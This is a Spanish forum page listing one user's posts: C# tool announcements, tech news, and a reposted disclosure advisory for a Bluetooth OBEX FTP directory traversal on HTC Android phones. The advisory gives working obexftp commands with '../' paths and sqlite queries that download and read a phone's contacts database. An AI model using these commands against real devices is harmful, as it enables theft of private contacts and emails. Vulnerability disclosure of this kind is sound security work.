elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 21
1  Foros Generales / Sugerencias y dudas sobre el Foro / MOVIDO: NO ARRANCA en: 6 Agosto 2013, 04:24
El tema ha sido movido a Windows.

https://foro.elhacker.net/index.php?topic=396330.0
2  Programación / Scripting / MOVIDO: [JS] Cada vez me siento más idiota, no comprendo lo más sencillo en: 17 Junio 2013, 21:25
El tema ha sido movido a Desarrollo Web.

https://foro.elhacker.net/index.php?topic=392788.0
3  Programación / Programación C/C++ / MOVIDO: Problema con Excepciones en C# en: 12 Junio 2013, 18:33
El tema ha sido movido a .NET.

https://foro.elhacker.net/index.php?topic=392359.0
4  Programación / .NET (C#, VB.NET, ASP) / WinWatcher (WinForms Application Source) en: 2 Diciembre 2012, 00:43
Buenas,

Entre ayer y hoy se me dió por crear una pequeña tool que ni bien iniciada se minimiza al trayicon, y luego va "cronometrando" el tiempo que se pasa en una ventana. El registro lo guarda o bien en formato de texto (esta "hardcodeado" el formato), o bien en XML.

Para que se hagan una idea, el XML es más o menos así;

Código
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <ArrayOfWatchedWindow xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  3.  <WatchedWindow>
  4.    <Executable>c:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\devenv.exe</Executable>
  5.    <ProcessId>5492</ProcessId>
  6.    <WindowText>WinWatcher (Running) - Microsoft Visual Studio</WindowText>
  7.    <ElapsedTime>00:00:01</ElapsedTime>
  8.  </WatchedWindow>
  9.  <WatchedWindow>
  10.    <Executable>C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Executable>
  11.    <ProcessId>6048</ProcessId>
  12.    <WindowText>(37) Twitter - Google Chrome</WindowText>
  13.    <ElapsedTime>00:00:16</ElapsedTime>
  14.  </WatchedWindow>
  15.  <WatchedWindow>
  16.    <Executable>C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Executable>
  17.    <ProcessId>6048</ProcessId>
  18.    <WindowText>Foro de elhacker.net - Índice - Google Chrome</WindowText>
  19.    <ElapsedTime>00:01:13</ElapsedTime>
  20.  </WatchedWindow>
  21.  <WatchedWindow>
  22.    <Executable>C:\Program Files (x86)\Windows Media Player\wmplayer.exe</Executable>
  23.    <ProcessId>6276</ProcessId>
  24.    <WindowText>Reproductor de Windows Media</WindowText>
  25.    <ElapsedTime>00:00:03</ElapsedTime>
  26.  </WatchedWindow>
  27. </ArrayOfWatchedWindow>

La jerarquía en base a la cual se cronometran las ventanas es justamente la que se ve en el XML; Ejecutable > PID de proceso > Texto de ventana

Existen dos momentos en los que se vuelcan los datos a archivo;
  • Cada 15 minutos
  • Al cerrar la aplicación

Con click derecho en el icono del trayicon se puede cambiar la configuración y ver el log actual sin necesidad del volcado :)

Descarga de código fuente: http://bit.ly/WinWatcher (C# Visual Express 2010)

Le quería dar un uso personal, pero tal vez luego le haga alguna mejora y/o refactoring de código, porque se por ejemplo que tiene un bug conocido, si en un navegador se cambia de pestaña no se refleja hasta bien no se minimize y vuelva a restaurar la ventana, y esto es porque preferí hookear el cambio de ventana en lugar de hacer polling con un timer, así que al cambiar de tab no se entera :-X

Cualquier consulta y/o comentario ya saben

Saludos
5  Foros Generales / Foro Libre / Las discusiones del foro ... en: 2 Noviembre 2012, 13:29
Al ver la imagen la asocié con el foro inmediatamente ...


:xD
6  Programación / .NET (C#, VB.NET, ASP) / IpToKml (Console Application Source) en: 26 Octubre 2012, 16:52
Buenas,

Hace algunos días y por cosas que no vienen al caso, se me dió por crear una pequeña tool (aplicación de consola) que se encarga de parsear N fuentes de datos, extraer IP's, geocalizarlas y volcarlas a un archivo KML (este tipo de archivos puede cargarse en Google Earth y Google Maps entre otros).

La idea de este post es justamente compartir la tool que he mencionado antes.

Comentarios generales:
  • Aplicación de consola (como ya he mencionado).
  • Utiliza la base de datos y las clases de Maxmind.
  • Utiliza commandline para el parseo de los parámetros de línea de comandos.
  • Extensible haciendo uso de MEF (Managed Extensibility Framework). Dado que la aplicación puede recibir datos de entrada de N fuentes, lo que hice fue crear un componente "parser". De este modo solo basta con crear un nuevo "parser" (dll) para que dinámicamente la aplicación los reconozca y pueda hacer uso de ellos (solamente deben de agregarse dentro de la carpeta "Extensions").

    En el source van 4 parsers básicos que he desarrollado:
    • Connections: identifica las conexiones actuales de la máquina, similar a netstat.
    • Pcap: extrae IPs de un archivo de captura de red pcap (de Wireshark por ejemplo).
    • PlainText: cualquier archivo que pueda ser reconocido como de texto.
    • Web: obtiene IPs desde una url especificada.

Ejemplo de uso:
Código
  1. C:\IpToKml\IpToKml\bin\Release>IpToKml.exe
  2.  
  3. Available Parsers:
  4.        + Connections
  5.        + Pcap
  6.        + PlainText
  7.        + Web
  8.  
  9. Usage:
  10.        IpToKml.exe ParserName --help
  11.  
  12. C:\IpToKml\IpToKml\bin\Release>IpToKml.exe web --help
  13.  
  14.  
  15.  u, url    Required. Url del sitio web.
  16.  help      Display this help screen.
  17.  
  18. C:\IpToKml\IpToKml\bin\Release>IpToKml.exe web -u "http://www.malwaredomainlist.com/mdl.php?search=&colsearch=All&quantity=All"
  19.  
  20. 21:44:39 Parsing Started
  21. 21:44:46 Parsing Completed
  22. 21:44:46 Finalizing
  23.        Available IP Addresses : 2103
  24.        Unavailable IP Addresses : 9
  25.        Total IP Addresses : 2112
  26. 21:44:47 Output File C:\Dropbox\WEB_251020124439.kml
  27.  
  28. C:\IpToKml\IpToKml\bin\Release>


Configuración:
Para poder utilizarlo correctamente hay que cambiar dos settings en el config de la aplicación (IpToKml.exe.config)
Código
  1. <?xml version="1.0"?>
  2. <configuration>
  3.  <appSettings>
  4.    <!--Ruta completa al archivo dat de la base de datos de IP-->
  5.    <add key="GeoIpDb" value="C:\GeoIpDb\GeoLiteCity.dat"/>
  6.    <!--Carpeta de salida para los KML generados-->
  7.    <add key="KmlFolder" value="C:\Dropbox\"/>
  8.  </appSettings>
  9. </configuration>

Descarga de código fuente: http://bit.ly/IpToKml (C# Visual Express 2010)

Cualquier consulta y/o comentario ya saben ;)

Saludos
7  Foros Generales / Noticias / Google adquiere Motorola Mobility por 12.500 millones de dólares en: 15 Agosto 2011, 15:06
No nos van a dejar tranquilos ni en agosto, sobre todo teniendo en cuenta la importancia de la noticia, y es que tal y como leéis en el titular, Google se hace con la empresa americana Motorola, más concretamente, la división encargada del negocio móvil.

La adquisición de la división Motorola Mobility de la histórica empresa de telecomunicaciones americana está valorada en 12.500 millones de dólares. Así podemos leerlo, de forma oficial en el blog de Google, a puño y letra de Larry Page.

La compra parece tener una intención bastante clara, tal y como os informamos hace unos días,Motorola tiene potente propiedad intelectual en su haber que le permite defenderse de todos los movimientos de patentes que estamos sufriendo en el panorama de la tecnología móvil. Justamente esto era lo que nos estaba Google anunciando hace unas semanas, pagar con la misma moneda.

La adquisición no implica ningún cambio en la filosofía Android como plataforma abierta, Motorola licenciará el sistema de la misma forma que lo ha estado haciendo desde que decidió formar parte de la Open Handset Alliance. Ambas empresas funcionarán como negocios separados.

Aunque intenten dejar el punto anterior bastante claro, será curioso empezar a conocer las opiniones del resto de fabricantes que apuestan por Android, ahora que Motorola estará manejada por la propia Google, y lógicamente tendrá alguna ventaja sobre el resto a la hora de confeccionar dispositivos, o recibir actualizaciones del sistema.

Del comunicado también podemos extraer algún mensaje dirigido a la competencia:

Citar
Hemos explicado recientemente como compañías como Apple y Microsoft se han unido en los ataques de patentes contrarias a la competencia en Android. El Departamento de Justicia de los Estados Unidos ha tenido que intervenir en los resultados de una subasta de patentes recientes para de esa forma “proteger la competencia y la innovación en la Comunidad del software de código abierto” y está estudiando los resultados de la subasta de Nortel.La adquisición de Motorola Mobility permitirá aumentar la competencia mediante el fortalecimiento de la cartera de patentes de Google, que nos permitirá proteger mejor a Android de las amenazas anticompetitivas por parte de Apple y Microsoft entre otras compañías.

En Xataka hemos estado siguiendo en las últimos días este tema, por si andáis un poco perdidos, os dejo con los enlaces en orden cronológico:


Fuente:http://www.xataka.com/moviles/google-adquiere-motorola-mobility-por-12500-millones-de-dolares
8  Foros Generales / Noticias / HTC / Android OBEX FTP Service Directory Traversal Vulnerability en: 26 Julio 2011, 14:28
Aquí podéis encontrar el informe completo de la vulnerabilidad.

Title: HTC / Android OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Android 2.1
- HTC devices running Android 2.2

Summary

HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.

Description

In the present HTC / Android phones include a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.

The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.

In HTC / Android phones, the default directory of the OBEX FTP Server is the SDCard. Only files placed in the directory of the SDCard can be shared. The user cannot select other directory so sensitive files related to the operating system are not exposed.

There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. The OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running Android operating system, so the vulnerability affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it. However, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

Scope of the attack

The Directory Traversal vulnerability allows a remote attacker to browse folders located anywhere in the file system and download any file contained in any folder.

1) List arbitrary directories

Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).

The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system:

Código:
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
 <parent-folder/>
 <folder name="sqlite_stmt_journals"/>
 <folder name="config"/>
 <folder name="sdcard"/>
 <folder name="d"/>
 <folder name="etc"/>
 <folder name="cache"/>
 <folder name="system"/>
 <folder name="sys"/>
 <folder name="sbin"/>
 <folder name="proc"/>
 <file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
 <file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
 <file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
 <file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
 <file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
 <file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
 <folder name="data"/>
 <folder name="root"/>
 <folder name="dev"/>
</folder-listing>done
Disconnecting..-done

2) Read arbitrary files

Any file located in the file system can be downloaded. This may lead to access confidential data such as contacts, messages, emails or temporary internet files.

- Emails from Google account downloaded via GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database:

Código:
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done

Once the database is downloaded, contacts can be queried with SQL:

Código:
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
...

Also contacts synced from Google and Facebook accounts can be queried from the same database:

Código:
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_*********
*_*******_*.jpg
...

Affected products

- HTC devices running Android 2.1
- HTC devices running Android 2.2

The following products were tested and showed to be vulnerable: HTC Wildfire A3333, Softbank 001HT (HTC Desire HD), EMobile S31HT (HTC Aria).

Vendor status

This vulnerability is related to CVE-2009-0244, a vulnerability announced in 2009 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe. After the vulnerability was disclosed, HTC issued security hotfixes under the name <span style="font-style:italic;">Hotfix to enhance the security mechanism of Bluetooth service</span> for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.

The current advisory was reported to HTC Japan in 2011/02. Subsequently, it was reported to HTC Europe in 2011/04 in order to obtain more feedback and re-attempt the collaboration. In both cases I failed to coordinate the disclosure of the advisory and release of the hotfix so finally I am forced to go public with all the information undisclosed.

The vulnerability is published as a zero-day threat. This means that all HTC devices running Android 2.1 and Android 2.2 shipped up to date July 2011 may be vulnerable and a security hotfix has not been issued by the manufacturer yet.

Users of HTC Android phones may expect to receive a notification for security update over-the-air regarding to this vulnerability, or find the latest updates in the support site.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

HTC Wildfire, HTC Desire HD and HTC Aria are trademarks of HTC Corporation (HTC). Softbank 001HT is a trademark of SOFTBANK Corp. EMobile S31HT is a trademark of EMOBILE Ltd.
9  Programación / Scripting / [PowerShell] WMI Query Language (eBook) en: 28 Abril 2011, 21:40
Abro el post simplemente para dejar enlace para descargar un eBook/pdf sobre WQL en Powershell que esta realmente muy bien.

Es free y esta en inglés: http://bit.ly/juWnQU

Saludos
10  Foros Generales / Noticias / Comprometen la seguridad de RSA y roban información sobre el producto SecurID en: 18 Marzo 2011, 12:35
RSA es una de las compañías de seguridad más importantes a nivel mundial. Han emitido un comunicado oficial en el que admiten que su seguridad interna se ha visto comprometida por atacantes y que han robado información relativa a su famoso producto SecurID. El problema es tan grave que involucra al gobierno de los Estados Unidos.

Arthur W. Coviello, Jr., director ejecutivo de RSA ha emitido un comunicado en el que confiesa que RSA ha sido víctima de un "ataque cibernético extremadamente sofisticado" que, por lo que se deduce, viene de tiempo atrás y ahora ha sido detectado. Esto es lo que se llama un ATP (Advanced Persistent Threat), en resumen, un ataque específicamente diseñado contra la compañía, por el que los atacantes obtienen acceso a información interna confidencial. Habitualmente estos ataques llevan meses de preparación y es necesaria una importante investigación posterior para ver cómo y cuándo comenzó. Sobre todo, hasta dónde han llegado.

Al parecer lo que se sabe es que han tenido acceso a "cierta" información relacionada con uno de sus productos estrella: SecurID. Se trata de un token físico que proporciona autenticación segura de dos factores (algo que se sabe y algo que se tiene). En vez de necesitar una sola contraseña para acceder a cualquier recurso, con el token es necesario un PIN y un número de seis cifras que genera el propio dispositivo. Ese código sólo es válido durante un tiempo limitado. Es utilizado por grandes compañías concienciadas con la seguridad para, habitualmente, acceso externo a las redes.

Según el comunicado, la información robada podría "reducir la efectividad de la implementación actual de la autenticación de dos factores". ¿Qué quiere decir esto? Realmente toda deducción no serán más que especulaciones, pero es posible que los ladrones hayan tenido acceso a información que permita deducir de qué forma se calculan las contraseñas de un solo uso y, por tanto, permitir a un atacante acceder a recursos ajenos sin necesidad de disponer del token físico. Pero no es posible asegurarlo en estos momentos. Además, el atacante necesitaría también el PIN del atacado, que es algo que, supuestamente, solo debería estar en la memoria del usuario.

Ante la gravedad del asunto, EMC (a la que pertenece RSA) ha rellenado un formulario llamado 8-K. Se trata de un documento gubernamental que se utiliza para informar de un evento importante e inesperado a la "U.S. Securities and Exchange Commission"

Hay que tener en cuenta que, como ha ocurrido en otras ocasiones con el robo de material secreto en empresas, a la larga puede hacerse público. Hoy en día podemos encontrar en redes P2P y puntos de descarga directa, desde partes del código fuente de Windows y del antivirus de Kaspersky, hasta todos los correos privados del último año del dueño la compañía de seguridad HBGary.

Quizás resulte extraño que una empresa dedicada por entero a la seguridad, y que lleva el nombre de los inventores de la criptografía moderna, haya sido comprometida. Pero es necesario recordar que esto ha pasado en los últimos años con muchas empresas importantes, desde Google a la propia HBGary (a la que destriparon por completo), y que nadie está a salvo de ataques si son lo suficientemente sofisticados.

Los consejos que da RSA a sus clientes son muy genéricos por ahora. Básicamente, mejorar la seguridad y estar más atentos. Pide, especialmente, concentrarse en "social media applications".

Además del golpe a la imagen, suponemos que es posible que RSA deba en un futuro cercano, o bien actualizar o bien reemplazar todos los tokens de sus clientes para garantizar su seguridad, lo que supondrá igualmente un coste económico importante para la compañía.

Fuente:http://www.hispasec.com/unaaldia/4528
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 21
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines